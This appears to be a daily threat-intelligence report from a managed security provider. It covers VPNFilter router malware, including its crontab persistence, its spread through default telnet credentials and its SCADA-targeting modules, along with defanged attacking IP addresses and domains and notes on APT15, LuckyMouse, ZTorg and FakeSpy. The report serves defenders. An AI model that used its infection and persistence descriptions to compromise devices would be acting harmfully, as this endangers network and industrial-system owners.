Last Updated: 3:44PM EST
As you may know we have been putting out a daily MSS report on what activity we have seen in the past 24 hours. This allows other managed security providers to see if they too are experiencing the same attacks and to report attacks to Jigsaw Security's SOC. The goal is to give visibility into items of interest to managed security providers. If you have information you would like to contribute please use the chat function on our website to talk to an analyst.
We continue to see botnet activity looking for telnet logins for IOT devices. Specifically we are seeing VPNFilter activity. VPNFilter is malware infecting a number of different kind of network routers, and seems to be designed specifically to target serial networking devices using the Modbus protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems using SCADA.
The malware uses default credentials to infect the machines, meaning that it can be avoided by changing passwords and other security on devices.
This software actually installs itself in multiple stages:
Stage 1 involves a worm and adds it to the crontab, the list of tasks run at regular intervals by the cron scheduler on Linux. This allows it to remain on the device, to re-infect it with the subsequent stages if they are removed.
Stage 2 is the actual body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure "dark web" Tor software to communicate via encryption.
Both Cisco and Symantec suggest that people who own affected devices do a factory reset. That is typically accomplished by using a small, pointed object, such as a straightened out paperclip, to push the small reset button on the back on the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but also restores the router to all original settings.
Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection.
See the affected devices list below to see if your router is on the list. The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall[.]com and using it to redirect queries from the stage one infection which has allowed the FBI to identify servers that are being used in this attack.
We have been consistently seeing attacks from 205.185.113[.]213 and they continue today. As previously reported this IP is running EXPLOIT Remote Command Execution via Shall Scripts on various targets. IN addition we are still seeing 104.244.76[.]219 which is running EXPLOIT Netcore Router Backdoor access attempts. This activity is still being seen.
We are seeing ZTorg malware affect mobile phones and continue to be an issue.
We continue to see LDPinch activity as well as some redirection of some of the infrastructure identified as LDPinch.
While APT15 is one of the lesser talked about threats, we have confirmed that the group is active and that new attacks have been carried out. Most of the activity surrounding this group has been observed to be attacking UK based companies. Over the past few days numerous media reports indicate that the group has been very active over the last several days, We have been seeing this activity since early May.
We have been seeing reports of LuckyMouse attacking Government websites and targeting Government related organizations. We have deployed protection to stop these attacks after seeing APT27 active and believe the campaigns may be related based on intelligence. Most of this activity is centered around the bbs.sonypsps[.]com domain and has been widely reported. Event 28729 and 28682 both cover this event and the surrounding activity. Alienvault OTX has additional indicators of average fidelity. We have expanded the event to include information uncovered by Jigsaw Security researchers. Customers can download indicators but they are already active in the FirstWatch sensor and will trigger if any activity is observed on your networks.
FakeSpy Android Malware:
We have added the FakeSpy Android malware detection to the FirstWatch sensor.
Note: This report may be updated throughout the day!